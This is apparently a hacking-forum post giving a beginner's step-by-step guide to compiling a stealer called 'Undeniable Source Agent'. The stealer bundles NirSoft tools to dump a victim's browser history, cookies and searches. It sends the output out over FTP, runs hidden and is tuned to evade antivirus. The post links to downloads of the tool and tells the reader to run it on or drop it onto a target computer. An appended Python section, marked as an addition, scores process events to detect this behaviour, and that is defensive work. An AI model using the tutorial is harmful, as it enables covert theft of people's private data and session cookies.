[FOR BEGINNERS] Create malware with just a few lines of code...

hacxx

This tutorial explains in detail how to edit Undeniable Source Agent. The user will need to buy a copy of Quick Batch File Compiler or search online for a rare release of Quick Batch File Compiler to avoid detections.

How to?
1 - Start by opening file.bat with Quick Batch File Compiler

2 - Change username and password after ftp line
First line username, Second line password

Or use the default.
The uploaded files cannot be deleted; a file is removed only if it is not downloaded for 30 days.

3 - Go to Embedded Files and add your app icon (https://iconarchive.com/ - Professional icons)
4 - Untick Add Administrator manifest.

5 - Add ChromeHistoryView.exe, EdgeCookiesView.exe, MyLastSearch.exe, USBDeview.exe and main.bat to the vault.
(https://www.nirsoft.net/ for useful executables)

NOTE: The coder can add as many executables as he or she wants. The only problem is that the executables must not be detected.


NOTE: The batch (file.bat) is set up to run locally, showing a console to the user.
Let's change that and conclude the tutorial...

6 - Go to source and add to all exes %MYFILES%\

Example: ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html
To: %MYFILES%\ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html


7 - On Quick Batch File Compiler go to Project > Options

8 - Tick the box Ghost Application, Untick Show splash on startup and ok.

9 - Go to Project > Compile and save the exe.

10 - Go to your target computer and execute the exe or find your way in to drop the executable.
------------------------------------------------------------------------------------------------
I'm releasing version 2, which fixes a bug I hadn't fixed in version 1.

Download:
https://filecrypt.cc/Container/DD10E0EE57.html
http://gigapeta.com/dl/10067377a5aa41c
https://oxy.cloud/d/HHQe
https://ddownload.com/px9u2texbl8o/Undeniable_Source_Agent_2.rar

Virustotal:
Not detected in original form, must be compiled to check results.
-------------------------------------------------------------------------------------------------
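From a detection standpoint, the behaviour described in this post leaves a recognisable process-creation trail: the NirSoft tools it names run with the `/shtml` export switch from an unpack directory, and the same parent starts an FTP client. The following is an added example, not part of the original post or the tool it describes, that scores that pattern over process-creation events. The Sysmon-style field names, the temp-directory unpack location, the use of `ftp.exe` for the upload, and the weights and threshold are all assumptions.

```python
import ntpath
import re

# Tool names and the /shtml export switch are the ones named in the post.
COLLECTORS = {"chromehistoryview.exe", "edgecookiesview.exe",
              "mylastsearch.exe", "usbdeview.exe"}
EXPORT_SWITCH = re.compile(r"(?i)(?:^|\s)/shtml\s+\S+")
# Assumption: the wrapper unpacks embedded files under a temp directory.
TEMP_DIR = re.compile(r"(?i)\\(?:temp|tmp)\\")


def score_parents(events):
    """Group process-creation events by parent and score each parent.

    +2 per collector run with an export switch, +1 more if it ran from a
    temp directory, +3 if the same parent also started ftp.exe.
    Returns {parent_image: score} for parents scoring 5 or more.
    """
    scores, collected, ftp_seen = {}, set(), set()
    for ev in events:
        parent = ev["ParentImage"].lower()
        name = ntpath.basename(ev["Image"]).lower()
        if name in COLLECTORS and EXPORT_SWITCH.search(ev["CommandLine"]):
            collected.add(parent)
            scores[parent] = scores.get(parent, 0) + 2
            if TEMP_DIR.search(ev["Image"]):
                scores[parent] += 1
        elif name == "ftp.exe":
            ftp_seen.add(parent)
    for parent in collected & ftp_seen:
        scores[parent] += 3
    return {p: s for p, s in scores.items() if s >= 5}


# Constructed sample events (Sysmon Event ID 1 style fields), not real logs.
SAMPLE = [
    {"ParentImage": r"C:\Users\a\Downloads\app.exe",
     "Image": r"C:\Users\a\AppData\Local\Temp\x1\ChromeHistoryView.exe",
     "CommandLine": r"ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html"},
    {"ParentImage": r"C:\Users\a\Downloads\app.exe",
     "Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Tools\USBDeview.exe",
     "CommandLine": "USBDeview.exe"},
]

if __name__ == "__main__":
    print(score_parents(SAMPLE))
```

Grouping by direct parent is a simplification: if an intermediate `cmd.exe` sits between the wrapper and its children, the events need to be correlated over the process tree instead.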